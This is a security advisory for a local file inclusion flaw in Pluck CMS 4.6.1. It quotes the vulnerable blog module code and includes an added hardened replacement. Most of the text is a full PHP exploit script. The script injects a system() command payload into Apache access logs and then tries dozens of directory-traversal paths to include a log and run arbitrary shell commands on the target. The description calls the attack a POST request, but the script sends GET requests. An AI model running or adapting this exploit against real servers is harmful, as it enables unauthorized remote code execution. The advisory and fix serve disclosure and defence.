Pluck module_pages_site.php Module Local File Inclusion Vulnerability

Release date: 2009-03-23
Updated: 2009-03-24

Affected systems:
somp Pluck CMS 4.6.1
Description:
BUGTRAQ ID: 34207

pluck is a simple content management system written in PHP.

The \data\modules\blog\module_pages_site.php module of pluck does not properly filter the request parameter submitted by the user:

...

    $includepage = 'blog_include.php';
    //Only set 'view post'-page if a post has been specified
    if (isset($_GET['post'])) {
        //Check if post exists, and include information
        if (file_exists('data/settings/modules/blog/posts/'.$_GET['post'])) {
            include('data/settings/modules/blog/posts/'.$_GET['post']);
            $module_page['viewpost'] = $post_title;
        }
    }
...

A remote attacker can include arbitrary local resources by submitting a specially crafted HTTP POST request to the server, leading to arbitrary code execution.
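A hardened replacement for the include shown above, added here as an example and not code from pluck or the advisory. It assumes the posts directory from the snippet (data/settings/modules/blog/posts/) and that post files carry a .php extension; the function name resolve_post_path is mine.

```php
<?php
// Added example (not pluck's own code): allow-list the post name and
// verify the resolved path stays inside the posts directory, so a
// traversal sequence or a path to a web server log file is never included.

// Return the canonical path of the requested post, or null if the
// request must be rejected.
function resolve_post_path(string $post, string $postsDir): ?string
{
    // Allow-list: a post id is a plain file name, no directory parts,
    // no NUL bytes, no encoded tricks (assumes posts are .php files).
    if (!preg_match('/\A[A-Za-z0-9_-]+\.php\z/', $post)) {
        return null;
    }
    $base = realpath($postsDir);
    $full = realpath($postsDir . '/' . $post);
    if ($base === false || $full === false) {
        return null;   // directory missing or post does not exist
    }
    // Containment check: the resolved file must sit directly under $base.
    if (dirname($full) !== $base) {
        return null;
    }
    return $full;
}

$includepage = 'blog_include.php';
// Only set 'view post'-page if a post has been specified
if (isset($_GET['post'])) {
    $target = resolve_post_path((string) $_GET['post'],
                                'data/settings/modules/blog/posts');
    if ($target !== null) {
        include $target;
        $module_page['viewpost'] = $post_title;
    }
}
```

The allow-list is the part that matters: because the exploit below delivers its payload through an access.log that the vulnerable include reads, a check that only strips "../" would not be enough, while a log file name can never match the pattern.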

<*Source: Alfons Luja
  
  Link: http://secunia.com/advisories/34415/
*>

Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!

<?php

if ($argc < 5) die("Use: host port path command [www.target.com 80 pluck \"ls -l\"]\n");

set_time_limit(0);
error_reporting(0);

$host    = $argv[1];
$port    = $argv[2];
$path    = $argv[3];
$command = $argv[4];

// add something if not w00rking ;x

$shell = array(
    "<?php echo(' e[Ho_trip ');system('$command');echo(' d34th_trip'); ?>",
    "../apache/logs/access.log",
    "../../apache/logs/access.log",
    "../../../apache/logs/access.log",
    "../../../../apache/logs/access.log",
    "../../../../../apache/logs/access.log",
    "../../../../../../apache/logs/access.log",
    "../../../../../../../apache/logs/access.log",
    "../../../../../../../../apache/logs/access.log",
    "../../../../../../../../../apache/logs/access.log",
    "../../../../../../../../../../apache/logs/access.log",
    "../../../../../../../../../../../apache/logs/access.log",
    "../var/log/httpd/access.log",
    "../../var/log/httpd/access.log",
    "../../../var/log/httpd/access.log",
    "../../../../var/log/httpd/access.log",
    "../../../../../var/log/httpd/access.log",
    "../../../../../../var/log/httpd/access.log",
    "../../../../../../../var/log/httpd/access.log",
    "../../../../../../../../var/log/httpd/access.log",
    "../../../../../../../../../var/log/httpd/access.log",
    "../../../../../../../../../../var/log/httpd/access.log",
    "../../../../../../../../../../../var/log/httpd/access.log",
    "../var/log/apache/access.log",
    "../../var/log/apache/access.log",
    "../../../var/log/apache/access.log",
    "../../../../var/log/apache/access.log",
    "../../../../../var/log/apache/access.log",
    "../../../../../../var/log/apache/access.log",
    "../../../../../../../var/log/apache/access.log",
    "../../../../../../../../var/log/apache/access.log",
    "../../../../../../../../../var/log/apache/access.log",
    "../../../../../../../../../../var/log/apache/access.log",
    "../../../../../../../../../../../var/log/apache/access.log",
    "../usr/local/apache2/logs/access.log",
    "../../usr/local/apache2/logs/access.log",
    "../../../usr/local/apache2/logs/access.log",
    "../../../../usr/local/apache2/logs/access.log",
    "../../../../../usr/local/apache2/logs/access.log",
    "../../../../../../usr/local/apache2/logs/access.log",
    "../../../../../../../usr/local/apache2/logs/access.log",
    "../../../../../../../../usr/local/apache2/logs/access.log",
    "../../../../../../../../../usr/local/apache2/logs/access.log",
    "../../../../../../../../../../usr/local/apache2/logs/access.log",
    "../../../../../../../../../../../usr/local/apache2/logs/access.log",
);

function _hdr($int) {   // was not supposed to use file_get_contents
    global $shell, $host, $path;
    $header  = "GET /$host/$path/$shell[$int]  HTTP/1.1\r\n";
    $header .= "Host: $host\r\n";
    $header .= "User-Agent: _echo [ru] (Win6.66; @)\r\n";
    $header .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $header .= "Accept-Language: en-us,en;q=0.5\r\n";
    $header .= "Accept-Encoding: gzip,deflate\r\n";
    $header .= "Connection: close\r\n\r\n";
    return $header;
}

function _inject($hosts, $ports) {
    $hnd = fsockopen($hosts, $ports, $errno, $errstr, 30);
    if (!$hnd) die("Injection error $errstr\n");
    fwrite($hnd, _hdr(0));
    fclose($hnd);
}

function _result($data) {
    $ret = explode(' e[Ho_trip ', $data);
    if (isset($ret[1]) && $ret[1] != "") {
        for ($i = 1; $i < count($ret); $i++) {
            $ret_2 = explode(' d34th_trip', $ret[$i]);
            if ($i - count($ret) == -1) {
                if ($ret_2[0] != "") {
                    echo($ret_2[0]);
                } else {
                    die("Exploit failed!!\n");
                }
            }
        }
    }
}

function _exploit($hosts, $paths) {
    global $shell;
    $count = count($shell);

    // index 0 of $shell is the payload; the remaining entries are tried in turn
    for ($i = 1; $i < $count; $i++) {
        $tab = file_get_contents("http://" . $hosts . "/" . $paths . "/data/modules/blog/module_pages_site.php?post=$shell[$i]");
        _result($tab);
    }
}

echo("---- pluck v 4.6.1 -----\n\n" .
     "Author: Alfons Luja\n" .
     "Target: $host\n" .
     "Path: $path\n" .
     "Port: $port\n" .
     "COM: $command\n" .
     "Ex: poc.php www.target.com 80 pluck \"dir\"\n\n");

_inject($host, $port);
_exploit($host, $path);

?>

Recommendation:
Vendor patch:

somp
----
The vendor has not yet released a patch or upgrade. We recommend that users of this software keep an eye on the vendor's homepage for the latest version:

http://www.pluck-cms.org/

This vulnerability advisory was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.